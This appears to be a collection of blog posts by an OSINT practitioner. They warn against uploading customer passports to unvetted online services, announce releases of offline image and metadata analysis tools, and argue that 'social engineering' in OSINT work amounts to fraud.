19 posts

Please don’t use unknown online services for customer verification.

I didn’t really know how to title this post, as the above seems almost too obvious. Unfortunately, I’ve found more and more private sector companies using random online services for customer verification and ‘OSINT’ work. I was finally prompted to write this after seeing a company upload a customer’s passport to Forensically (which is a fantastic site) and then a popular reverse image search site. I believe Forensically and the reverse image site are all above board, but I don’t know that, and neither did they when they uploaded the passport.

The issue isn’t just that this is happening, but that those I’ve spoken to just don’t understand why it’s an issue. This is even in the wake of GDPR (which you’ll be painfully aware of if you’re in Europe). What’s most confusing about all this is that those working in counter-fraud/customer verifications know how attractive photos of passports and the like are to criminals, but they don’t seem to make the connection between using random online services and the potential for criminality.

Since challenging a few companies, the two phrases I’ve heard on repeat are:
We’ve checked the site’s code of conduct/details and it’s fine” or “We’ve checked the code and nothing gets ‘uploaded’ anywhere, it’s all on-page javascript etc.”

This might be true at 9am, but might have changed by 1030am – have you checked again? Each time you uploaded something? Really?

A random site on the internet has nothing to prevent them doing whatever they like, and changing what they do at will. What if your favourite reverse image search tool decided one day to start publishing all the pictures you’ve reverse searched somewhere? Would you know if it changed? Would your staff? What would you be able to do about it?

Similarly with tools that are all running ‘on page’ and not uploading the data to a server – would you know if that changed? It’s usually a single line of code to dump all of the results to a server somewhere.

Not to ramp up the scare tactics, but I’ve personally heard of a few people running sites with free services getting shady offers involving skimming data, and it only takes a few bad days to make those offers seem a lot more appealing. Obviously this can happen in any business context, but it’s far more likely if they’re not breaking any contracts.

How can I properly procure an online service?

The first step with using anything to process customer data is always to get straight on the phone to your legal department. There’s no substitute for proper legal advice, and with data being such a hot issue at the moment, it’s vital to stay on the right side of the law with it all.

As some more general guidelines for if you’ve not got a great legal department:
If you can’t get something that works completely offline (and make sure that it’s properly firewalled off), you need to get a proper, legally binding agreement. If you’re in Europe, for each service you use, you need a ‘data processor agreement’ ( to achieve basic compliance. Even if you’re not based in Europe, you’re still going to run into trouble if you don’t have a similar sort of agreement in place. The agreement doesn’t need to be a 300 page tome – I’ve seen perfectly acceptable agreements on two sides of A4.

When dealing with any supplier, make sure to ask what happens with the data – do they store it? How long for? Do they have external auditing procedures? This all needs to be in writing. Often suppliers will have a boilerplate contract which won’t go into much detail – ignore these (or fill them out if you must) and send over a list of all your questions and write your own contract up. My advice is to make the questions as direct as possible and with as little wiggle room as possible. Don’t allow for responses like ‘we keep your data for as long as is reasonable’ – you want it in a numerical format. If they can’t give you an exact timeframe, write your own clause in – ‘as soon as possible, but always within x weeks/months’. Ideally, they shouldn’t store anything at all, but this somehow seems impossible for most services.

You also need to make sure that you’re notified of any changes to their service. This can be a tricky one to negotiate, as most companies will only really want to notify you of big updates or changes. Don’t settle for this – you need to be informed of any change to the live code base, and to have a designated point of contact to talk these changes through. You also need to be able to leave the contract if any of the changes aren’t to your liking.

Final Notes

I know this all sounds like common sense, but somehow the risks get forgotten somewhere down the line. In the last year or two – regardless of all the data leaks we’ve seen – some counter-fraud and verification teams are still using online services on faith alone. Check what you’re using, how you’re using it and if you have everything you need in place.

Image Interrogator – v0.2 released!

This release has mainly been about smartening up the interface as sometimes it would get thrown off by certain size images, too much metadata, too little metadata and pretty much anything else.

  • Made the interface not overlap, and not panic so much when it gets very large or small images.
  • Added a rough image resize ability for really big pictures. It’s not a good idea to do something like Error Level Analysis on a resized image, so it resets when you adjust/apply filters/do error level analysis.
  • Prevented Image Interrogator from creating a temporary file when doing ELA – this prevented the software from running in some directories.
  • Squashed some bugs

Get it here:

The next release will possibly add wavelet analysis and hopefully speed the software up even further.

Image Interrogator v0.1 Released

I’ve been relatively quiet for the last few months, and that’s because I’ve been working on a completely new tool for analysing images. This aims to be a much leaner, lightweight tool for those that just need to quickly analyse an image for obvious manipulation.

Get it here:

Windows: Image Interrogator v0.1 (hosted on Github)

The main features of Image Interrogator are as follows:

  1. Error Level Analysis
  2. Image adjustments (sharpening, contrast, edge detection etc.)
  3. Basic Metadata Analysis
  4. Completely offline.

There were a few reasons behind creating this tool;
First and foremost was that a number of customer verification and counter-fraud teams that I’ve worked with have expressed a need for a really quick tool to be able to do some basic (primarily visual) analysis before diving into the metadata/further checks. Their main tool seems to currently be Paint, so anything is an upgrade at that point.

Secondly, whilst there are some great online tools for conducting visual analysis methodologies like Error Level Analysis (a prime example being Forensically), it’s difficult to find offline tools that do the same thing. Using online tools can be risky, and (serious time) in Europe you need to make sure you have a data processing agreement with each online service you use to analyse images ( so it’s important to have an offline option. This software doesn’t phone home at all, and feel free to block it in firewalls (as you should do with all software that doesn’t specifically need to use the internet!).

Finally, I’ve been using the fantastic Nuitka in creation of this tool – for those non-techy people, it basically just turns the code into a much faster, smaller program. Metadata Interrogator will be using this shortly to make it run faster (and a slightly smaller file size, much to the delight of those with 90’s HDs), but it’s a lot of work due to the third party libraries MI uses, so Image Interrogator is a way to get to grips with Nuitka before making the big change over.

As always, let me know your thoughts, comments, prophecies and predictions.

v0.7 released!

It’s been a while but here’s a new release!

I’ve added in a new passport MRZ resolver as it’s been quite a requested function – most of the ones available are online only and whilst I’m sure they don’t scrape any data, it’s always good to be careful.

IPTC and PDF metadata was a little bit lacking previously – it was getting the main fields but getting stuck on some of the (admittedly less useful) fields. It should gather it all now. I’ve also made MI a lot better at grabbing creation type dates (still be careful with this!)

v0.7 – Callahan

  • Passport MRZ resolver. This is extremely alpha, but was requested by a few companies using MI as most tools for that are online.
  • Formatting/display improvements.
  • IPTC metadata now displays properly.
  • All fields added/calculated by MI (and not part of the metadata) now start with a *
  • MI tries harder to find a creation date – still be careful with this.
  • More metadata from PDF files, and removed some useless values.
  • ‘Select Folder’ now works again.

Get it here:

Social Engineering – basically just fraud.

I’ve been doing Open Source Intelligence (OSINT) gathering professionally for quite a while now – back from the days when it was just a GeoCities check to see if the subject had been ridiculous enough to create a page dedicated to their criminal enterprise (surprisingly/unsurprisingly, this was very common). However, I’ve only recently shuffled my way into the OSINT ‘scene’ which has popped up on Reddit/Twitter/forums. It’s great to see that there’s a network of people passionate about the subject area and there is a lot of great sharing and caring going on.

However, as with any community, a lot of buzzwords creep in, it starts to become a ‘club’, and newcomers flock in with wildly varying levels of experience. It’s great that things are opening up as it all adds new perspectives, but since getting involved I’ve seen a lot of people posting methodologies and suggestions which are…well pretty much just illegal. There’s no way to sugar coat it, and it doesn’t matter what jurisdiction you’re in: some of what is being shared as ‘OSINT methodologies’ fall directly into either harassment, stalking or fraud.

The main offender for this is ‘Social Engineering‘.

Social Engineering – what it is.

The Wikipedia entry for Social Engineering (the best we can get to the current consensus for the word) is:

Social engineering, in the context of information security, refers to psychological manipulation of people into performing actions or divulging confidential information.

For anyone unsure of what Social Engineering is (which seems to be a lot of people), this video is the single best explanation:

As you can see, it’s basically lying to someone to get what you want via invoking the most holy trinity of the BLT. This is otherwise known as fraud.

Here’s the UK and the US definitions of fraud in case anyone has forgotten:

Fraud act 2006 (Section 2)

[A person commits fraud if they make…] a false representation, dishonestly, knowing that the representation was or might be untrue or misleading, with intent to make a gain for himself or another, to cause loss to another or to expose another to risk of loss.

US Code 18 (it’s a bit trickier in the US as there are many laws to choose from which cover it):

Whoever falsely and willfully represents himself to be a citizen of the United States shall be fined under this title or imprisoned not more than three years, or both.

(Many more under Chapter 47, Chapter 63 and stated cases)

Lets take the UK definition and apply it to our man Crash Override. He commits a false representation straight out by saying he’s “Mr Eddie Vedder from accounting”. He knows this is untrue and misleading, and he does this for gain (to get access to the modem number). It’s pretty straight forward.

As you can see, the definition of social engineering is just fraud by another name. Now some might start arguing that ‘manipulation’ doesn’t have to involve fraud, but I honestly can’t think of a ‘manipulation’ which wouldn’t be fraudulent in some way by most legal systems.

That isn’t what *I* mean though.

In computer security discussions, the term ‘social engineering’ is well understood – it’s the phishing scams and ransomware attacks. However this term which most people seem to understand in the context of compsec, somehow gets distorted when we talk about OSINT – I’ve seen posts with things like ‘if that doesn’t work try a bit of social engineering to see if you can find out x’ or ‘I couldn’t find out anything online so I used social engineering to get what I needed’.

Now I don’t think that people are quite recommending ransomware or similar – it’s more likely one of the below:

  • The writer doesn’t really understand what ‘social engineering’ is and just uses it as a buzz word for anything from adding a subject as a friend on Facebook to holding their spouse hostage.
  • They’re using it to reference social media OSINT methodologies.
  • The writer doesn’t want to say ‘lie to them to get what you want’.

Now the first one is a distinct possibility – we’ve all heard countless people use phrases in that sort of clunky, ‘I’ve-only-heard-this-at-a-conference’ way and I feel that a lot of people are using the term Social Engineering to sound a bit more ‘exciting’. It certainly sounds cooler than ‘…and then I looked at his Facebook feed until my eyes turned into sandpaper-y cubes.’

The second I think is mostly a way for OSINT practitioners to flag up that they do ‘social media stuff’ as well as Experian checks. I’ve been to a number of conferences recently where a worried director exclaims ‘won’t someone think of the social media platforms!’ after too much talking about any other type of OSINT service (or whilst the speaker is just taking a breath) and ‘social engineering’ sounds like they know how to do the facebooks.

More than that, I think some ‘OSINT evangelists’ are also trying to push such language in a marketing sense – the whole ‘we’re willing to go to the very edge of legality/I can kill a man with my intersects alone’ vibe sells contracts unfortunately.

I know. Why is this important?

Mostly because I feel there’s a lingering misunderstanding that using the word OSINT makes you somehow exempt from the usual rules. It’s the same as the ‘if it’s on the net then I can do what I like with it’ misconception.

Everyone who has been involved in this field in a professional setting knows that isn’t the case, but unfortunately a lot of newcomers seem to believe that there’s some sort of magical get-out-of-jail-free card available under the umbrella of ‘doing OSINT’. It’s always been a problem, but using ‘criminal’ terms like social engineering in a ‘valid tactic’ sort of way starts to muddy the water more than ever.

This is compounded by a mix up of what is acceptable when hired to do security/pentesting, and what is acceptable without such a contract – this may seem obvious to some, but for newcomers it’s not. They read @OSINT_BLACK_OPS_SN1PER_HACK3R tweet ‘wasn’t getting anywhere on my new contract so did a bit of social engineering and now I’m the CEO’s dentist’ and think ‘I’m learning how to do OSINT gathering! I’ll social engineer my local gardening club and see what Margery is really up to!’

Instead of the 50k bonus and as much mouthwash as he can swig for the rest of his life, our intrepid newbie ends up having awkward bedtime chats with cellmate and fellow stalker Profusely Sweaty Greg, all the while wondering why the magical shield of ‘just OSINT’ing’ didn’t protect him.

For some, this whole post will seem all very patronising and obvious – to others, it will seem like pedantry. I understand this, and I’m not trying to say that we should jealously guard our secrets or make the community any less welcoming to newcomers, but for those who are experienced I’d really like to ask you to try to share your knowledge responsibly and throw in a quick comment the next time you see someone getting told to ‘do a bit of social engineering’.

The road map from v0.6 to v0.7

Version 0.6 has been a bit of a turning point for the project – I’d say that Metadata Interrogator now does what I wanted it to do when I set out to create it. I wouldn’t say it’s reached ‘v1.0’ yet, but it analyses a whole raft of metadata above just the usual EXIF data, it has a useful timeline and highlights some interesting data both in comparison between files and across a whole data set.

As it’s got to that stage, I don’t think it’s necessary to do quite so many small iterations, and so the move between 0.6 and 0.7 is going to be a big one and take some time to do. The below is a sort of road map on where I want to take the project.

  1. Performance – This is the big one, currently it takes far too long to load up and analyse files. To try to get better performance (and maybe a smaller file size?!) I’ll try to port it across to Nuitka ( I’ve heard fantastic things about it, and I’m sure it’ll improve things no end. Early tests have not ended well however, so time will tell if I can gather together enough goat entrails and black candles to make this work.
  2. Release on Mac and Linux – I’m holding off on this till I sort out Nuitka, but it’s a main priority after that.
  3. Installer version – Whether this is necessary depends on the gains I get from Nuitka – if they’re impressive I’ll keep it portable, however if not I’ll add a version that can be installed which will give faster access for regular users.
  4. Pre-computed Analysis – One thing I’m very interested in doing is doing analysis on large data sets of files to work out what ‘normal’ metadata drift on a single device looks like. As in, how many (and which) fields change as one smartphone takes 100 different pictures. This will then be built into the software to highlight where the differences aren’t ‘normal’.
  5. Overhaul the UI – The UI works, but it’s still a bit janky in parts. This isn’t a top priority as it all seems to work roughly fine for me, but it’s not ideal.

As always, any comments or suggestions would be great.

v0.6 Released!

This release is a particularly big one (like the last) and has some major changes in it. Firstly, I’m now using matplotlib for the analysis timeline, so it looks much, much better and allows for things like colour coding. Whilst it does bring with it a small performance drop, I’ll be using it for more analysis graphics in the future so I think it’s worth while. I’ve also made a lot of improvements to the data set analysis and match analysis functions.

This will probably be the last incremental release for a while – I’ll be publishing a road map shortly which shows what’s next on the agenda, but I feel it’s in a state now where Metadata Interrogator fulfils all of my original needs.

Change Log:

  • Migrated the timeline to MatPlotLib – this slightly slows down the loading time, but I think it’s well worth it and will be used for more analysis graphics in the future.
  • The timeline has been drastically improved, with a much better layout and ability to handle high numbers of files.
  • Colour coding for different file types has been implemented on the timeline .
  • The data set analysis function has been improved, and now lists file types in the set.
  • The file comparison function has been improved to more accurately show differences.
  • Minor performance improvements across the board, especially in analysis times.

Get it here:

v0.5 Released!

This release of Metadata Interrogator is a bit of a turning point – it’s a lot more stable now and I feel that most of the bugs have been ironed out. I’ve also started on the ‘Data set analysis’ feature – this analyses all the files currently in the data table and looks for things of interest. At the moment it’s very basic, but I’ll be expanding it soon.

As always, if you have any requests for features in this exif and metadata analyser, I’d be very interested to hear them and then complain about how difficult it would be to implement them.

Change Log:

  • Basic Data Set Analysis; currently extremely basic, but it’s being worked on.
  • The only good bug is a dead bug, and I’ve squashed a lot of bugs.
  • New fancy icons.
  • MI should throw up more errors if you try to do something…erroneous.
  • Some very minor performance improvements.

Get it here: